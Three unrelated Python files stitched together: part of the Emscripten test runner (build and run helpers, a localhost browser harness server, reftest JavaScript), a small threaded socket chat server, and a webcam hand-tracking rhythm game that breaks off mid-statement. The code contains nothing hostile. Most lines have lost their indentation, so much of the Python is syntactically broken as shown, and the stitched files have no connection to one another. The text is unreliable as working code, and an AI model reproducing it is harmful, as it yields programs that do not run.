assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
write_file(filename, src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
return self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, read_file(expected_output_filename), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
out_suffix = kwargs.pop('out_suffix', '')
outfile = shared.unsuffixed(srcfile) + out_suffix + '.out'
expected = read_file(outfile)
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False, emcc_args=[],
interleaved_output=True,
regex=False,
output_basename=None):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
js_file = self.build(filename, libraries=libraries, includes=includes,
force_c=force_c, emcc_args=emcc_args,
output_basename=output_basename)
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.replace_suffix(js_file, '.wasm.c')
executable = shared.replace_suffix(js_file, '.exe')
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode,
interleaved_output=interleaved_output)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all or len(expected_output) == 1:
for o in expected_output:
if regex:
                self.assertTrue(re.search(o, js_output), 'Expected regex "%s" to match on:\n%s' % (o, js_output))
else:
self.assertContained(o, js_output)
else:
if regex:
match_any = any(re.search(o, js_output) for o in expected_output)
self.assertTrue(match_any, 'Expected at least one of "%s" to match on:\n%s' % (expected_output, js_output))
else:
self.assertContained(expected_output, js_output)
if assert_returncode == 0 and check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
return js_output
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party/freetype/include'),
'-I' + test_file('third_party/poppler/include')
]
freetype = self.get_freetype_library()
    # Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
# TODO: remove -Wno-unknown-warning-option when clang rev 11da1b53 rolls into emscripten
self.emcc_args += ['-Wno-deprecated-non-prototype', '-Wno-unknown-warning-option']
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
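# The flow, as implemented by TestServerHandler.do_GET below: the harness page polls GET /check;
# when a test has been queued, the server answers with "COMMAND:<url>" and chdirs into that
# test's directory so its files can be served; the opened test window then reports back via a
# /report_result?... request, which is pushed onto out_queue for run_browser() to consume.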
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(read_binary(test_file('browser_harness.html')))
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
    def log_request(self, code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
  # Include C/C++ reporting code (REPORT_RESULT macros) as well as JS helpers
FULL = 2
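# A minimal usage sketch (hypothetical call, mirroring how compile_btest below consumes this
# enum): a browser test that only needs the JS-side reporting helpers could use
#
#   self.compile_btest(['test.c', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
#
# while tests that rely on the REPORT_RESULT macro keep the default Reporting.FULL.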
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.also_wasm2js = int(os.getenv('EMTEST_BROWSER_ALSO_WASM2JS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
reporting = read_file(test_file('browser_reporting.js'))
write_file('reftest.js', '''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
/** @suppress {uselessCode} */
function setupRefTest() {
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
/** @suppress{checkTypes} */
window.requestAnimationFrame = function(func) {
return realRAF(function() {
func();
realRAF(doReftest);
});
};
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
}
setupRefTest();
''' % (reporting, basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
    # Inject support code for reporting results. This adds an include path and force-includes
    # a header so testcases can use REPORT_RESULT, and also adds a C file to be compiled
    # alongside the testcase, which contains the implementation of REPORT_RESULT (we can't
    # just include that implementation in the header as there may be multiple files being
    # compiled here).
args += ['-sIN_TEST_HARNESS']
if reporting != Reporting.NONE:
      # For basic reporting we inject JS helper functions to report the result back to the server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
        # also compile in report_result.c and force-include report_result.h
args += ['-I' + TEST_ROOT,
'-include', test_file('report_result.h'),
test_file('report_result.c')]
if EMTEST_BROWSER == 'node':
args.append('-DEMTEST_NODE')
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
assert('reporting' not in kwargs)
assert('expected' not in kwargs)
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_wasm2js=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args
args = args.copy()
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-sGL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
if EMTEST_BROWSER == 'node':
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
output = self.run_js('test.js')
self.assertContained('RESULT: ' + expected[0], output)
else:
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
    # Tests can opt into also being run under wasm2js (-sWASM=0)
if 'WASM=0' not in original_args and (also_wasm2js or self.also_wasm2js):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-sWASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-sGL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure,
make,
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = Path(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
  # Sometimes useful when debugging to comment this out (along with the rmtree above) so an existing build directory is reused
shutil.copytree(source_dir, project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = os.environ.copy()
env.update(env_init)
if not native:
# Inject emcmake, emconfigure or emmake accordingly, but only if we are
# cross compiling.
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
else:
make = [EMMAKE] + make
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
print('-- configure stdout --')
print(read_file(Path(project_dir, 'configure_out')))
print('-- end configure stdout --')
print('-- configure stderr --')
print(read_file(Path(project_dir, 'configure_err')))
print('-- end configure stderr --')
raise
# if we run configure or cmake we don't then need any kind
# of special env when we run make below
env = None
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
      print('-- end make stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, read_binary(f)))
return generated_libs
|
Server.py
|
from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from threading import Thread
clients = set()
nicknames = []
def clientThread(clientSocket, clientAddress, nickname):
    while True:
        try:
            message = clientSocket.recv(1024).decode("utf-8")
            if not message:
                # An empty read means the peer closed the connection cleanly.
                clients.remove(clientSocket)
                print(clientAddress[0] + ":" + str(clientAddress[1]) + " disconnected")
                break
            print(f"{nickname} : {message}")
            if ":signal number" in message:
                print("yes")
                for client in clients:
                    if client is not clientSocket:
                        client.send((f'{nickname}:' + message).encode("utf-8"))
            else:
                for client in clients:
                    if client is not clientSocket:
                        client.send((f"{nickname} : " + message).encode("utf-8"))
        except ConnectionResetError:
            # The peer vanished abruptly; drop it instead of spinning on the dead socket.
            clients.discard(clientSocket)
            break
    clientSocket.close()
hostSocket = socket(AF_INET, SOCK_STREAM)
hostSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR,1)
hostIp = "127.0.0.1"
portNumber = 7500
hostSocket.bind((hostIp, portNumber))
hostSocket.listen()
print ("Waiting for connection...")
if __name__=='__main__':
while True:
clientSocket, clientAddress = hostSocket.accept()
clients.add(clientSocket)
nickname = clientSocket.recv(1024).decode('utf-8')
# print("Nickname",nickname)
# nicknames.append(nickname)
print ("Connection established with: ", clientAddress[0] + ":" + str(clientAddress[1]))
thread = Thread(target=clientThread, args=(clientSocket, clientAddress,nickname ))
thread.start()
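# A minimal client sketch (hypothetical, not part of this file): the server expects the very
# first message after connecting to be the nickname, and every later recv() to be a chat line
# that is relayed to the other connected clients with a "nickname : " prefix.
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   s = socket(AF_INET, SOCK_STREAM)
#   s.connect(("127.0.0.1", 7500))
#   s.send("alice".encode("utf-8"))            # nickname handshake (first message)
#   s.send("hello everyone".encode("utf-8"))   # shown to others as "alice : hello everyone"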
|
scene_handler.py
|
from beatmap_reader import *
#from hand_tracking import *
import pyglet
import time
from pyglet.gl import *
import cv2
import numpy as np
from PIL import Image
import mediapipe as mp
import threading
mp_drawing = mp.solutions.drawing_utils
mp_drawing_styles = mp.solutions.drawing_styles
mp_hands = mp.solutions.hands
osu_file_name = 'natsumatsuri'
beatmap = read_beatmap(osu_file_name+'.osu')
bgm = pyglet.resource.media(osu_file_name+'.mp3')
hit_sound = pyglet.media.load('hit.wav', streaming=False)
# hit_sound_player = pyglet.media.Player()
# hit_sound_player.queue(hit_sound)
# hit_sound_player.volume = 0.2
osu_w = 640
osu_h = 480
WIDTH = 1280
HEIGHT = 720
RADIUS = 50
T_START = -1500  # hitpoints appear 1.5 s before their scheduled time
T_PERFECT = 300  # +/-0.3 s window scores PERFECT
T_GOOD = 800     # +/-0.8 s window scores GOOD
T_END = 800      # removed as a MISS 0.8 s after the scheduled time
window = pyglet.window.Window(width=WIDTH, height=HEIGHT)
num_batch = pyglet.graphics.Batch()
circle_batch = pyglet.graphics.Batch()
outer_batch = pyglet.graphics.Batch()
cursor_batch1 = pyglet.graphics.Batch()
cursor_batch2 = pyglet.graphics.Batch()
score_batch = pyglet.graphics.Batch()
start_time = time.time()*1000
def hit_judge(ptx, pty, cursorx, cursory):
return (ptx-cursorx)**2+(pty-cursory)**2 < RADIUS**2
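# Worked example of the timing windows above (using the constants as set): a hitpoint scheduled
# at time=5000 ms becomes visible at t=3500 (T_START=-1500), counts as PERFECT if hit while
# |t-5000| < 300, as GOOD while |t-5000| < 800, otherwise as OK, and is cleared as a MISS once
# t > 5800 (T_END=800).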
score=0
score_label = pyglet.text.Label('Score: '+str(score),
font_name='Arial',
font_size=36,
x=WIDTH*0.9, y=HEIGHT*0.95,
anchor_x='center', anchor_y='center', color=(0,0,0,255))
hit_label = pyglet.text.Label('',font_name='Arial', font_size=20, bold=True,
x=0, y=0,
anchor_x='center', anchor_y='center', color=(0, 255, 0, 255))
score_background = pyglet.shapes.Rectangle(WIDTH*0.8, HEIGHT*0.9,300,100)
score_background.opacity = 200
curr_i = 0
cursor_left1 = None
cursor_left2 = None
cursor_right1 = None
cursor_right2 = None
for hitpoint in beatmap:
hitpoint['deleted'] = False
def update_circle(dt):
global cursor_left1,cursor_left2, cursor_right1, cursor_right2, score, score_label, hit_label, beatmap, curr_i
t = time.time()*1000 - start_time
cursor_left1 = pyglet.shapes.Circle(left_hand_pos[0], left_hand_pos[1], 15, color=(0,0,255),batch=cursor_batch1)
cursor_left2 = pyglet.shapes.Circle(left_hand_pos[0], left_hand_pos[1], 20, color=(255,255,255),batch=cursor_batch2)
cursor_right1 = pyglet.shapes.Circle(right_hand_pos[0], right_hand_pos[1], 15, color=(255,0,0),batch=cursor_batch1)
cursor_right2 = pyglet.shapes.Circle(right_hand_pos[0], right_hand_pos[1], 20, color=(255,255,255),batch=cursor_batch2)
for hitpoint in beatmap:
gen_time = int(hitpoint['time'])
if hitpoint['deleted']:
continue
if t < gen_time + T_START:
break
elif t > gen_time + T_END:
x, y = int(hitpoint['x'])/osu_w*WIDTH+100, int(hitpoint['y'])/osu_h*HEIGHT+50
hitpoint['inner'].delete()
hitpoint['outer'].delete()
hitpoint['deleted'] = True
# score -= 10
hit_label = pyglet.text.Label('MISS',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(255, 0, 0, 255))
score_label = pyglet.text.Label('Score: '+str(score),
font_name='Arial',
font_size=36,
x=WIDTH*0.9, y=HEIGHT*0.95,
anchor_x='center', anchor_y='center', color=(0,0,0,255))
continue
else:
x, y = int(hitpoint['x'])/osu_w*WIDTH+100, int(hitpoint['y'])/osu_h*HEIGHT+50
hitpoint['outer'] = pyglet.shapes.Circle(x, y, RADIUS*(1+(gen_time-t)/2000), color=(255, 255, 255), batch=outer_batch)
hitpoint['inner'] = pyglet.shapes.Circle(x, y, RADIUS, color=(255, 102, 170), batch=circle_batch)
if (hit_judge(x, y, left_hand_pos[0], left_hand_pos[1])
or hit_judge(x, y, right_hand_pos[0], right_hand_pos[1])):
hitpoint['inner'].delete()
hitpoint['outer'].delete()
hitpoint['deleted'] = True
hit_sound.play()
if np.abs(gen_time-t) < T_PERFECT:
score += 100
hit_label = pyglet.text.Label('PERFECT',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
                    anchor_x='center', anchor_y='center', color=(0, 255, 0, 255)) # green
elif np.abs(gen_time-t) < T_GOOD:
score += 50
hit_label = pyglet.text.Label('GOOD',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(255, 255, 0, 255)) # yellow
else: # OK
score += 20
hit_label = pyglet.text.Label('OK',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(185, 214, 255, 255)) #light blue
score_label = pyglet.text.Label('Score: '+str(score),
font_name='Arial',
font_size=36,
x=WIDTH*0.9, y=HEIGHT*0.95,
anchor_x='center', anchor_y='center', color=(0,0,0,255))
def cv2glet(img):
'''Assumes image is in BGR color space. Returns a pyimg object'''
rows, cols, channels = img.shape
raw_img = Image.fromarray(img).tobytes()
top_to_bottom_flag = -1
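    # A negative pitch tells pyglet that rows are ordered top-to-bottom,
    # compensating for OpenCV's row order (pyglet expects bottom-to-top).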
bytes_per_row = channels*cols
pyimg = pyglet.image.ImageData(width=cols,
height=rows,
format='BGR',
data=raw_img,
pitch=top_to_bottom_flag*bytes_per_row)
pyimg.scale = 2
return pyimg
cap = cv2.VideoCapture(0)
frame_data = cap.read()
frame_data = frame_data[1]
pyimg = cv2glet(frame_data)
game_running = True
left_hand_pos = [0,0,0]
right_hand_pos = [0,0,0]
def thread_mediapipe():
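    # Descriptive comment (added): runs in a background thread. Grabs webcam
    # frames, runs MediaPipe Hands, and updates left_hand_pos / right_hand_pos
    # (x mirrored to match the flipped preview, y flipped for pyglet's
    # bottom-left origin) as well as the shared frame_data buffer.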
global frame_data, left_hand_pos, right_hand_pos
cap = cv2.VideoCapture(0)
camera_w = 640*2 # scaled to double
camera_h = 480*2
with mp_hands.Hands(
model_complexity=0,
